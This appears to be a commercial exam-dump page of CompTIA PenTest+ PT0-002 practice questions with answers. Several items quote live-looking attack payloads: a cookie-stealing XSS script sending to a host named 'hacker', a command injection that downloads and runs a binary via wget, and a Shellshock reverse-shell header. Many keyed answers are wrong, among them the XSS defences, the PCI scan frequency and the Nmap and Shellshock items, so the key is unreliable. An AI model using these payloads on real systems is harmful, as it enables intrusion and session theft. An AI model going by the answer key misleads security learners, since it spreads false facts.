PT0-002 Dumps PDF New [2021] Ultimate Study Guide [Q40-Q62]


PT0-002 Exam Dumps PDF Updated Dump from PDF4Test Guaranteed Success

NEW QUESTION 40
A penetration tester obtained the following results after scanning a web server using the dirb utility:
...
GENERATED WORDS: 4612
---- Scanning URL: http://10.2.10.13/ ----
+ http://10.2.10.13/about (CODE:200|SIZE:1520)
+ http://10.2.10.13/home.html (CODE:200|SIZE:214)
+ http://10.2.10.13/index.html (CODE:200|SIZE:214)
+ http://10.2.10.13/info (CODE:200|SIZE:214)
...
DOWNLOADED: 4612 - FOUND: 4
Which of the following elements is MOST likely to contain useful information for the penetration tester?

  • A. info
  • B. about
  • C. index.html
  • D. home.html

Answer: B

 

NEW QUESTION 41
Given the following code:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT>
Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

  • A. Session tokens
  • B. Base64 encoding
  • C. Output encoding
  • D. Input validation
  • E. Web-application firewall
  • F. Parameterized queries

Answer: A,F

 

NEW QUESTION 42
A penetration tester has identified several newly released CVEs on a VoIP call manager. The scanning tool the tester used determined the possible presence of the CVEs based off the version number of the service. Which of the following methods would BEST support validation of the possible findings?

  • A. Test with proof-of-concept code from an exploit database
  • B. Manually check the version number of the VoIP service against the CVE release
  • C. Utilize an nmap -sV scan against the service
  • D. Review SIP traffic from an on-path position to look for indicators of compromise

Answer: C

 

NEW QUESTION 43
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
exploit = "POST "
exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a"
exploit += "HTTP/1.1"
Which of the following commands should the penetration tester run post-engagement?

  • A. chmod 600 /tmp/apache
  • B. taskkill /IM "apache" /F
  • C. rm -rf /tmp/apache
  • D. grep -v apache ~/.bash_history > ~/.bash_history

Answer: C

 

NEW QUESTION 44
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.
INSTRUCTIONS
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Answer:

Explanation:

 

NEW QUESTION 45
A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?

  • A. As backup in case the original documents are lost
  • B. To validate the billing information with the client
  • C. As proof in case they are discovered
  • D. To guide them through the building entrances

Answer: C

 

NEW QUESTION 46
A penetration tester has been given eight business hours to gain access to a client's financial system. Which of the following techniques will have the highest likelihood of success?

  • A. Attempting to tailgate an employee going into the client's workplace
  • B. Performing spear phishing against employees by posing as senior management
  • C. Dropping a malicious USB key with the company's logo in the parking lot
  • D. Using a brute-force attack against the external perimeter to gain a foothold

Answer: D

 

NEW QUESTION 47
A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective?

  • A. Wait for the next login and perform a downgrade attack on the server.
  • B. Use an FTP exploit against the server.
  • C. Capture traffic using Wireshark.
  • D. Perform a brute-force attack over the server.

Answer: C

 

NEW QUESTION 48
A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant. Which of the following is the MINIMUM frequency to complete the scan of the system?

  • A. Monthly
  • B. Annually
  • C. Weekly
  • D. Quarterly

Answer: C

 

NEW QUESTION 49
A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee's birthday, the tester gave the employee an external hard drive as a gift. Which of the following social-engineering attacks was the tester utilizing?

  • A. Tailgating
  • B. Baiting
  • C. Phishing
  • D. Shoulder surfing

Answer: B

 

NEW QUESTION 50
Which of the following BEST describes why a client would hold a lessons-learned meeting with the penetration-testing team?

  • A. To discuss the findings and dispute any false positives
  • B. To ensure the penetration-testing team destroys all company data that was gathered during the test
  • C. To provide feedback on the report structure and recommend improvements
  • D. To determine any processes that failed to meet expectations during the assessment

Answer: D

 

NEW QUESTION 51
You are a penetration tester running port scans on a server.
INSTRUCTIONS
Part 1: Given the output, construct the command that was used to generate this output from the available options.
Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Answer:

Explanation:
Part 1 - nmap 192.168.2.2 -sV -O
Part 2 - Weak SMB file permissions

 

NEW QUESTION 52
A company recruited a penetration tester to configure wireless IDS over the network. Which of the following tools would BEST test the effectiveness of the wireless IDS solutions?

  • A. Aircrack-ng
  • B. Wireshark
  • C. Kismet
  • D. Wifite

Answer: A

 

NEW QUESTION 53
A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company's network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment.
Which of the following actions should the tester take?

  • A. Create a detailed document of findings before continuing with the assessment.
  • B. Halt the assessment and follow the reporting procedures as outlined in the contract.
  • C. Perform forensic analysis to isolate the means of compromise and determine attribution.
  • D. Incorporate the newly identified method of compromise into the red team's approach.

Answer: A

 

NEW QUESTION 54
A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

  • A. nmap 192.168.1.1-5 -PA22-25,80
  • B. nmap 192.168.1.1-5 -PS22-25,80
  • C. nmap 192.168.1.1-5 -Ss22-25,80
  • D. nmap 192.168.1.1-5 -PU22-25,80

Answer: B

 

NEW QUESTION 55
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

  • A. exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
  • B. exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
  • C. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
  • D. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"}

Answer: C

 

NEW QUESTION 56
A penetration tester who is performing a physical assessment of a company's security practices notices the company does not have any shredders inside the office building. Which of the following techniques would be BEST to use to gain confidential information?

  • A. Tailgating
  • B. Badge cloning
  • C. Dumpster diving
  • D. Shoulder surfing

Answer: C

 

NEW QUESTION 57
A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?

  • A. PsExec
  • B. Alternate data streams
  • C. PowerShell modules
  • D. MP4 steganography

Answer: A

 

NEW QUESTION 58
Appending string values onto another string is called:

  • A. concatenation
  • B. compilation
  • C. connection
  • D. conjunction

Answer: A

 

NEW QUESTION 59
Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?

  • A. Whether the country where the cloud service is based has any impeding laws
  • B. Whether the specific cloud services are being used by the application
  • C. The geographical location where the cloud services are running
  • D. Whether the cloud service provider allows the penetration tester to test the environment

Answer: C


 

NEW QUESTION 60
A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?

  • A. nmap -vv sUV -p 53,137-139,161-162 10.10.1.20/24 -oA udpscan
  • B. nmap -vv sUV -p 53,123,161-162 10.10.1.20/24 -oA udpscan
  • C. nmap -vv sUV -p 53, 122-123, 160-161 10.10.1.20/24 -oA udpscan
  • D. nmap -vv sUV -p 53, 123-159 10.10.1.20/24 -oA udpscan

Answer: B

 

NEW QUESTION 61
A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment?

  • A. Ping flood
  • B. Smurf
  • C. Fraggle
  • D. Ping of death

Answer: B

 

NEW QUESTION 62
......

Pass Your CompTIA Exam with PT0-002 Exam Dumps: https://www.pdf4test.com/PT0-002-dump-torrent.html

PT0-002 Exam Dumps - CompTIA Practice Test Questions: https://drive.google.com/open?id=1tNQlCBVke_Xhjis2IthyZBSh5QmZ9F7i